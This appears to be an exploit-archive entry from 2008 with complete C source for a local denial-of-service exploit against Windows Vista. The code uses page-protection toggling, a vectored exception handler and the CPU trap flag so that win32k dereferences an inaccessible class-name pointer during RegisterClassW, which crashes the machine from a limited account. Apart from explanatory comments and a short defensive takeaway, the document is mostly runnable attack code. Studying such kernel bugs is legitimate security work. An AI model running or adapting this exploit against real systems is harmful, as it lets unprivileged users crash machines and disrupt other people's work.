MS Windows Vista Access Violation from Limited Account Exploit (BSoD)
Source: www.vfcocus.net  Author: Defsanguje  Published: 2008-10-06
// //////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium & Ultimate @ October 05 2008         //
/////////////////////////////////////////////////////////////////
//
// Mechanism: the page holding the window class name is made
// PAGE_NOACCESS before RegisterClassW is called. Every user-mode
// touch of that page faults; a vectored exception handler makes the
// page readable again, sets the CPU trap flag so exactly one
// instruction executes, and the resulting single-step exception
// restores PAGE_NOACCESS. User mode therefore always sees a valid
// string, one instruction at a time, while win32k later dereferences
// the pointer with the page inaccessible and without a protecting
// exception frame, which bugchecks the machine.
//
// Defensive takeaway: kernel code must probe and access user memory
// only under __try/__except, and must capture user data once rather
// than re-reading a user-mode buffer after validating it.
#include <stdio.h>
#include <windows.h>

WCHAR szClass[] = L"BSODClass";

// Vectored exception handlers use the PVECTORED_EXCEPTION_HANDLER
// convention (LONG NTAPI (EXCEPTION_POINTERS*)); declaring the handler
// with CALLBACK keeps the x86 stack consistent.
LONG CALLBACK ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);
typedef PVOID (WINAPI* pFunc)(ULONG ulFirst, PVECTORED_EXCEPTION_HANDLER lpHandler);
pFunc pRtlAddVectoredExceptionHandler;

// Layout of ExceptionRecord->ExceptionInformation for an access
// violation: [0] = 0 for a read, 1 for a write; [1] = faulting address.
// Both entries are ULONG_PTR, so the struct matches on x86 and x64.
typedef struct
{
    ULONG_PTR ulWriteViolation;
    LPVOID    lpAddress;
} EXCEPTION_ACCESS_VIOLATION_PARAMS;

int main()
{
    WNDCLASSW wc;
    DWORD dwOldProt;

    printf("Windows Vista BSoD from usermode/limited account.\n"
           "Coded by. Defsanguje - October 05 2008\n");

    // Setup vectored exception handler. SEH would work also.
    // GetModuleHandleA is used explicitly so the build works with UNICODE defined.
    pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                                            "RtlAddVectoredExceptionHandler");
    if (pRtlAddVectoredExceptionHandler == NULL)
    {
        printf("RtlAddVectoredExceptionHandler not found.\n");
        return 1;
    }
    // TRUE = install as the first handler in the chain.
    (*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);

    // Dummy data; only lpszClassName matters for the trigger.
    wc.style         = 0;
    wc.lpfnWndProc   = NULL;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = GetModuleHandle(NULL);
    wc.hIcon         = NULL;
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = (HBRUSH)GetStockObject(HOLLOW_BRUSH);
    wc.lpszMenuName  = NULL;
    wc.lpszClassName = szClass;

    // Make the page holding the class name inaccessible, then hand the
    // pointer to the kernel through RegisterClassW.
    VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt);
    RegisterClassW(&wc);

    printf("You shouldn't see this");
    return 0;
}

LONG CALLBACK ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
    static LPVOID lpLastAddress;
    static DWORD dwOldProt;
    EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;

    switch(lpExceptionInfo->ExceptionRecord->ExceptionCode)
    {
        case EXCEPTION_ACCESS_VIOLATION:
            // User-mode code touched the protected page: open it up for
            // exactly one instruction.
            avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->ExceptionInformation;
            VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt);
            lpLastAddress = avParams->lpAddress;

            // Set trap flag (EFLAGS.TF, bit 8): the CPU raises a
            // single-step exception after the faulting instruction retires.
            lpExceptionInfo->ContextRecord->EFlags |= 0x100;
            break;
        case STATUS_SINGLE_STEP:
            // The instruction completed; close the page again so the next
            // access (user or kernel) faults.
            VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);
            break;
        default:
            break;
    }
    return EXCEPTION_CONTINUE_EXECUTION;
}
